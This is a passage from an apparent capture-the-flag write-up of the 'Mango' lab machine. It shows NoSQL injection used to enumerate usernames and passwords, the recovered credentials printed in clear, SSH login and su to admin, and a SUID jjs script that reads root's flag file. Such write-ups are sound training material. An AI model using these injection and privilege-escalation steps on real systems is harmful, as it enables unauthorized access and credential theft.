No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
...

So there are two users, admin and mango We can also enumerate the passwords

kali@kali:~/tools/Nosql-MongoDB-injection-username-password-enumeration$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
...

So we found two password, but we have to correlate the password to the correct user. Using the login interface we will build the right couples username:password

The found credentials are, then: admin:t9KcS3>!0B#2 mango:h3mXK8RhU~f{]f5H

we found, previously, that there is a SSH server running on this host, so I will try the credentials against the SSH server. The admin credential does not work, the mango one works!

kali@kali:~$ ssh admin@staging-order.mango.htb
admin@staging-order.mango.htb's password: 
Permission denied, please try again.
admin@staging-order.mango.htb's password: 

kali@kali:~$ ssh mango@staging-order.mango.htb
mango@staging-order.mango.htb's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Mar 13 15:22:53 UTC 2020

  System load:  0.01               Processes:            113
  Usage of /:   26.3% of 19.56GB   Users logged in:      1
  Memory usage: 31%                IP address for ens33: 10.10.10.162
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Mar 13 13:30:20 2020 from 10.10.14.54
mango@mango:~$ 

Doing the enumeration I found the user flag in the user admin home. As the mango user I can't read it. Reading the ssd_config file I found the admin user is not allowed to connect using SSH, so it is possible the password is good for the user, so I try to switch to the admin user, with the previously found password.

mango@mango:/home/admin$ cat /etc/ssh/sshd_config |grep Users
AllowUsers mango root
mango@mango:/home/admin$ su - admin
Password: 
$ bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/admin$ 
admin@mango:/home/admin$ cat user.txt 
79bf31c6c6eb38a8567832f7f8b47e92

So the user flag is 79bf31c6c6eb38a8567832f7f8b47e92

Checking for some vectors for privilege escalation I found a SUID file: -rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

I was not able to obtain a root shell, anyway I got the root token

mango@mango:~$ su - admin
Password: 
$ 
$ 
$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs> > > 
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
8a8ef79a7a2fbb01ea81688424e9ab15
jjs> $ 

the root token is 8a8ef79a7a2fbb01ea81688424e9ab15

- lilloX

Share on: Diaspora*TwitterFacebookLinkedInHackerNewsEmailReddit


Comments

comments powered by Disqus